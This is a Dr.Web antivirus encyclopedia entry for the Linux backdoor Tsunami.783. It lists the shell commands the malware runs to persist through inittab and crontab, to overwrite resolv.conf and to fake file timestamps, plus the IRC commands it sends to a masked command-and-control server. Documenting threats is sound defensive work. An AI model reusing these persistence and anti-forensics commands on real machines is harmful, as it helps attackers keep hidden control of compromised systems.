Para el funcionamiento correcto del sitio web, debe activar el soporte de JavaScript en su navegador.
Linux.BackDoor.Tsunami.783
Added to the Dr.Web virus database:
2017-12-21
Virus description added:
2017-12-21
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/etc/inittab
/etc/rc.local
Malicious functions:
Launches itself as a daemon
Modifies router settings:
Launches processes:
sh -c echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &
sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
chmod 700 <SAMPLE_FULL_PATH>
touch -acmr /bin/ls <SAMPLE_FULL_PATH>
sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1
crontab -l
grep -v <SAMPLE_FULL_PATH>
grep -v no cron
grep -v lesshts/run.sh
sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00846930886
sh -c crontab /var/run/.x00846930886
crontab /var/run/.x00846930886
sh -c rm -rf /var/run/.x00846930886
rm -rf /var/run/.x00846930886
sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
cat /etc/inittab
sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
sh -c cat /etc/inittab2 > /etc/inittab
cat /etc/inittab2
sh -c rm -rf /etc/inittab2
rm -rf /etc/inittab2
sh -c touch -acmr /bin/ls /etc/inittab
touch -acmr /bin/ls /etc/inittab
sh -c /bin/uname -n
sh -c nvram get router_name
/bin/uname -n
Performs operations with the file system:
Modifies file access rights:
<SAMPLE_FULL_PATH>
/var/spool/cron/crontabs/tmp.uMsivb
Creates or modifies files:
/etc/resolv.conf
/var/run/.x00846930886
/run/.x00846930886
/var/spool/cron"/crontabs/tmp.uMsivb
/var/spool/cron/crontabs/tmp.uMsivb
/etc/inittab2
Deletes files:
/var/run/.x00846930886"
/etc/inittab2"
Network activity:
Awaits incoming connections on ports:
Connects to the following servers over the IRC protocol:
Server: 14#.#4.240.14; Command: NICK x86|c|0|993936|unknown\nUSER x00 localhost localhost :1.0+tftp_jun112017\n
Server: 14#.#4.240.14; Command: PONG :BE4734FC\n
Server: 14#.#4.240.14; Command: MODE x86|c|0|993936|unknown -xi\n
Server: 14#.#4.240.14; Command: MODE x86|c|0|993936|unknown +B\n
Server: 14#.#4.240.14; Command: JOIN #x86 :0599\n
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Descargue Dr.Web para Android
Gratis por 3 meses
Todos los componentes de protección
Renovación de la demo a través de AppGallery/Google Pay
Si Vd. continúa usando este sitio web, esto significa que Vd. acepta el uso de archivos Cookie y otras tecnologías para que recabemos las estadísticas sobre los visitantes. Más información
OK